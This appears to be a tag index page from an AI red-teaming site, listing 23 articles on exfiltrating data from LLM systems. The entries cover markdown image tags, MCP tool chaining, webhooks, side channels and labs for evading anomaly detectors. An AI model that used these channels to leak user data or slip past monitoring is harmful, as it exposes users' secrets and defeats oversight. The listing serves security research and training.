# exfiltration
23 articlestagged with “exfiltration”
Link-Based Exfiltration
Using hyperlinks, redirects, or URL parameters to exfiltrate data from AI systems through markdown links, tool-generated URLs, and API callback exploitation.
Markdown Image Injection
Injecting markdown image tags with attacker-controlled URLs to exfiltrate conversation data via HTTP image requests.
Function Calling Data Exfiltration
Using function calls as data exfiltration channels to extract information from constrained environments.
MCP Resource Data Exfiltration
Methods for extracting sensitive data through MCP resource access patterns and sampling API abuse.
MCP Cross-Server Data Exfiltration
Chain MCP tool calls across servers to exfiltrate data from restricted environments to attacker-controlled endpoints.
Tool Call Forensics
Forensic investigation of agent tool calls: detecting unauthorized tool usage, analyzing parameter manipulation evidence, identifying exfiltration traces, and reconstructing agent action chains.
Case Study: GPT Plugin Data Exfiltration
Analysis of data exfiltration vulnerabilities in early ChatGPT plugin ecosystem including cross-plugin attacks.
Code Completion Data Exfiltration
Using code completion interfaces to exfiltrate sensitive data from development environments including secrets, API keys, and proprietary code.
Data Exfiltration via Vector Databases
Data exfiltration techniques for vector databases: embedding inversion to reconstruct documents, enumeration attacks, and similarity-based data harvesting.
Blind Prompt Injection Techniques
Attacking LLM systems without seeing output: TOCTOU injection, side-channel exfiltration, blind payload delivery, and timing-based exploitation.
Lab: RAG Full Chain Attack
Hands-on lab for executing a complete RAG attack chain from document injection through retrieval manipulation to data exfiltration, targeting every stage of the Retrieval-Augmented Generation pipeline.
Markdown Rendering Exfiltration
Exploit Markdown rendering in chat UIs to exfiltrate data through image tags and links.
Data Heist: Multi-Channel Exfiltration
Exfiltrate a secret key through a heavily monitored LLM system using covert exfiltration channels.
Stealth Exfiltration Challenge: Zero Detection
Exfiltrate data from a monitored LLM system without triggering any of the deployed anomaly detectors.
Data Exfiltration via Side Channels
Extract data from LLM systems using timing, token probability, and formatting side channels.
Lab: Markdown-Based Injection
Hands-on lab exploring how Markdown rendering in AI-generated outputs can be exploited to inject hidden content, exfiltrate data through image tags, and manipulate displayed information.
MCP Resource Data Exfiltration (Intermediate Lab)
Exploit MCP resource URIs to access and exfiltrate data beyond intended scope boundaries.
Streaming Response Exfiltration
Exploit streaming API responses to exfiltrate data that might be caught by batch output filters.
Lab: Data Exfiltration via Webhooks
Test data exfiltration paths through LLM-triggered webhooks, API callbacks, and external URL rendering.
Stealth Data Extraction Techniques
Stealthy techniques for extracting sensitive data from AI systems without triggering alerts.
Callback Abuse in MCP
Advanced walkthrough of abusing MCP callback mechanisms for unauthorized actions, data exfiltration, and privilege escalation in agent-tool interactions.
Cross-Plugin Data Exfiltration Walkthrough
Walkthrough of chaining multiple plugins/tools to exfiltrate data from LLM agent systems.
Output Format Exfiltration Techniques Walkthrough
Walkthrough of using output format manipulation to exfiltrate data through code blocks, markdown, and structured outputs.